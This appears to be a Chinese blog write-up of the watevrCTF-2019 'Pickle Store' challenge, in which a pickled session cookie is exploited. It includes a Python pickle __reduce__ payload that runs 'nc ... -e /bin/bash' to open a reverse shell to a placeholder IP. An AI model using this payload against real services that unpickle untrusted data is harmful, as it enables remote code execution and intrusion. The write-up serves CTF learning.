[watevrCTF-2019]Pickle Store

最新推荐文章于 2024-09-11 14:19:01 发布
原创 最新推荐文章于 2024-09-11 14:19:01 发布 · 397 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习

本文探讨了在Python中使用pickle模块进行反序列化的过程,以及如何利用潜在的安全漏洞来尝试反弹shell。作者指出,由于不明确的hmac加密过程,构造特定的数据包以购买flag变得困难。然而,他们展示了如何创建一个恶意的pickle对象,通过导入os模块并执行远程命令来触发shell。这是一个关于web安全和Python反序列化漏洞的实际应用案例。
部署运行你感兴趣的模型镜像

在这里插入图片描述

购买 flag,钱不够只有500,抓包感觉 session可能有东西
在这里插入图片描述
在这里插入图片描述

后面那串是 hmac加密的吗,先不管,题目叫做 pickle,就想到了Python的反序列化
在这里插入图片描述

确实是pickle 的序列化,下一步该怎么做,去构造 1000购买flag吗,我们不知道 hmac的加密过程,所以很难直接构造

了解到这里还可以直接反弹shell,试试

import base64
import pickle

class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc xxx.xxx.xxx.xxx 2333 -e /bin/bash')",))

a = A()
print(base64.b64encode(pickle.dumps(a)))

在这里插入图片描述

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

BUUCTF:[watevrCTF-2019]Pickle Store
末初 · mochu7
07-26 1537
题目地址:https://buuoj.cn/challenges#[watevrCTF-2019]Pickle%20Store Pickle反序列化 使用pickle.loads()和base64对这串字符进行解码反序列化 利用Pickle反序列化exp反弹shell 在Buu的小号上开一台内网靶机 import base64 import pickle class A(object): def __reduce__(self): return (eval, ("__imp
python安全之Pickle反序列化漏洞学习
Mrs_H的博客
10-28 2783
前言 写这篇文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有反弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这篇文章主要还是通过我所遇到的pickle反序列化题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这篇文章之前,我想先贴出一位大佬的文章Pion1e
[CISCN2019 华北赛区 Day1 Web2]ikun
qq_62046696的博客
10-15 800
这里的.content就是读取源文件字节流,随后将该字节流编码为Unicode编码,方便再进行更加精确的解码。看见了jwt,通过上面链接了解jwt由三个部分组成,前两个部分分别是base64编码,解码可以获得。明显不够我们就1000也没有充值界面,所以最有可能的就是这个优惠看是否可以修改。以为要成功可是,限制admin,所以我们就要看一下是通过什么判断我的用户名的。下载到本地后需要使用,make命令,就会生成jwtcrack。找到了密码,然后就可以更改为admin。然后是181页,可是。
BUUCTF--[watevrCTF-2019]Pickle Store
qq_46263951的博客
08-08 613
一般看到商店需要购买flag的直接就会想到session和cookie 我们先将session的值来接
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 1151
详细讲解pickle
Buu [watevrCTF-2019]Pickle Store
夜风的博客
09-11 584
注意python反序列化的使用,pickle库,load反序列化,dump序列化。
[watevrCTF-2019]Pickle StorePickle反序列化】
D.MIND 的博客
04-29 3182
文章目录Pickle反序列化简单字符类型的反序列化类的反序列化`__reduce__`命令行下输入命令:python下反弹shell一、curl+base64二、curl -d三、nc 反弹shell 一进来看看Cookie处,果然又是一个session gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGVi
BUUCTF WEB PICKLE STORE
qq_41696858的博客
09-30 464
众所周知,buuctf靶场经历了内网K8S改造,导致以前的小号的内网靶机的方法出了问题,我也疑惑了很久,该怎么去用这台不知道公网ip的靶机。后来我想明白了,给的是apache2的公网ip,那就直接外带啊,果然成功了,哈哈。看着像base64,解码一下,发现一个标志:anti_tamper_hmac。无法逆向的hmac,那么结合题目的pickle,八九不离十的猜是反序列化。这一题是一个简单的python反序列化,简单的写个脚本就好,没啥好说的。关于pickle的指令解析可以看这个师傅的。
BUUCTF之[watevrCTF-2019]Cookie Store
weixin_44632787的博客
07-30 505
BUUCTF之[watevrCTF-2019]Cookie Store 打开挑战页面发现它说你初始基金是50,但是购买flag需要100 然后参考源码和访问robots.txt都没有发现什么重要的信息,所以就用BurpSuite抓包试试看… 一开始是以为在id里面试试注入的,但是随便输入一些信息都没有看到什么可疑的,但是后来注意到cookie那里有个很像base64的加密,所以解密试试看有什么东西 结果发现!!! 所以payload: eyJtb25leSI6IDEwMCwgImhpc3Rvcnki
[watevrCTF-2019]Pickle Store pickle序列化漏洞~~
a3320315的博客
02-12 1936
题目介绍 要有1000美元买flag,然后我们查看header,扫目录之类的操作,最后在cookie中发现问题~~ gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu 先试试b...
python之JASON和pickle序列化与反序列化
anchaoxi6967的博客
05-02 130
json 和pickle 用于序列化的两个模块 json,用于字符串 和 python数据类型间进行转换 pickle,用于python特有的类型 和 python的数据类型间进行转换 Json模块提供了四个功能:dumps、dump、loads、load pickle模块提供了四个功能:dumps、dump、loads、load 同理,在JASON反序列化是...
python使用pickle,marshal进行序列化、反序列及JSON的使用
weixin_34291004的博客
05-13 208
Pickle序列化 python的pickle模块实现了基本的数据序列和反序列化。通过pickle模块的序列化操作我们能够将程序中运行的对象信息保存到文件中去,永久存储;通过pickle模块的反序列化操作,我们能够从文件中创建上一次程序保存的对象 JSON(JavaScript Object Notation) jso...
SSTI 服务端模板注入 / 沙盒逃逸
Kaleido76的博客
02-16 670
这个部分之前一直只会生搬硬套,其实到底是什么回事都不太清楚,这次查了很多资料,把这部分内容的思路整理一下。
[watevrCTF-2019]Supercalc flask-cookie伪造&SSTI
a3320315的博客
02-12 2125
题目 buu新上的题目,晚上没啥事情就做了一下~~ 打开页面是一个计算器 可以执行一些简单的运算,我们还是老实地按步骤走,先扫下目录,没发现什么东西,然后查看header,源码等,都没有发现思路,然后我们看了一下cookie 这个凭直觉都知道是flask的cooike,然后我们放到脚本里面解一下 这不是我们先前的计算么? 那么思路就很明显了,肯定是伪造cooike,那么我们就不必须拿到key才可...
punkt-1.0.pickle punkt-finalized.pickle
最新发布
03-15
### 关于 `punkt-1.0.pickle` 和 `punkt-finalized.pickle` 的差异与用途 在自然语言处理领域,NLTK 是一个非常流行的 Python 库,用于文本数据的预处理和分析。其中,`punkt` 是 NLTK 提供的一种无监督机器学习算法,主要用于句子分割(sentence tokenization)。它通过训练模型来识别英语中的句号、问号和其他标点符号作为句子边界。 #### 文件说明 `punkt-1.0.pickle` 和 `punkt-finalized.pickle` 都是 NLTK 中使用的序列化模型文件,它们存储了经过训练后的 Punkt 句子分割器的状态信息。以下是两者的具体区别: 1. **`punkt-1.0.pickle`** - 这是一个较旧版本的 Punkt 模型文件[^1]。 - 它可能基于早期的数据集或参数设置进行训练。 - 对某些特定语料库的效果可能会不如更新版本的理想。 2. **`punkt-finalized.pickle`** - 这是改进版的 Punkt 模型文件[^4]。 - 经过更广泛的测试和优化,适用于更多样化的现代文本环境。 - 推荐优先使用此文件以获得更好的性能表现。 #### 解决找不到 `.pickle` 文件的方法 当遇到 `'tokenizers/punkt/PY3/english.pickle' not found` 错误时,可以采取以下措施解决问题: - 使用命令 `nltk.download('punkt')` 自动下载所需资源[^2]。 - 如果自动下载失败,则手动获取最新版的 `nltk_data` 并按指定路径安装。 #### 示例代码展示如何加载这些资源 下面是一段简单的脚本,演示如何利用上述两个 `.pickle` 文件完成基本功能实现: ```python import nltk from nltk.tokenize import sent_tokenize # 下载必要资源 try: nltk.data.find('tokenizers/punkt') except LookupError: nltk.download('punkt') text = """Natural language processing (NLP) is a field of computer science, artificial intelligence, and linguistics concerned with the interactions between computers and human languages.""" sentences = sent_tokenize(text) print(sentences) ``` 该程序首先尝试定位本地是否存在已缓存的 `punkt` 数据;如果不存在,则触发在线下载流程。最终输出由输入字符串分解而成的一系列独立句子列表。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值